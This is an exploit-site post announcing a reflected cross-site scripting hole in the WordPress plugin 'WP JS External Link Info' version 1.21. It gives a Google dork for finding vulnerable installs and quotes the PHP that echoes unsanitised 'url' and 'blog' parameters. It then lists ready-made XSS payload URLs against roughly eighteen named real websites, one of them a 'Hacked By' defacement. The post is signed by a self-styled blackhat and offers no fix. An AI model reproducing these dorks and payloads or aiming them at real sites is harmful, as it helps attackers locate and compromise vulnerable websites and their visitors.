Home / exploits WordPress JS External Link Info Cross Site Scripting
Posted on 22 April 2014
######################################### # Exploit Title : Wordpress Wp Js External link Info Cross Site Scripting # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://wordpress.org # # Google Dork : inurl:wp-content/plugins/wp-js-external-link-info # # Date : 2014/4/16 # # Tested on : Windows 7 , Linux # # Version : 1.21 # ###################### # Exploit : Cross Site Scripting # Location : [Target]/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=[XSS] # ###################### # Vulnerable Code : # [CODE] $url = $_GET['url']; $blog = urldecode($_GET['blog']); ... <?php echo $url; ?> <?php echo $blog; ?> # [/CODE] # ### Demo # http://www.timefederalsavings.com/newsite2/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # http://www.motiv.org.uk/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # http://www.blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # http://sectank.net/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # http://bkalitva.ru/blog/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # # http://www.thfcu.org/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # http://openwebstuff.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # # http://www.londonfootball.org.uk/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%22%3E%3Cmarquee%3EHacked%20By%20Milad%20Hacking%20TEST%20XSS%20Loool%3C/marquee%3E # # #http://www.ilikesharepoint.de/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # #http://accordnetwork.org/forum/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # # http://blog.al8z.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # # http://michelearnese.it/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # # http://www.city-infos.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # # http://konaproperty.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # # http://www.degrotelongontstekingmeting.nl/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # # http://www.cityblogs.nfo.ph/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # # http://www.cityblogs.nfo.ph/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E # # # ############################################ Discovered By : Milad Hacking We Love Mohammad Mail : milad.hacking.blackhat@gmail.com Home Page : https://www.facebook.com/milad.hacking.5 ############################################
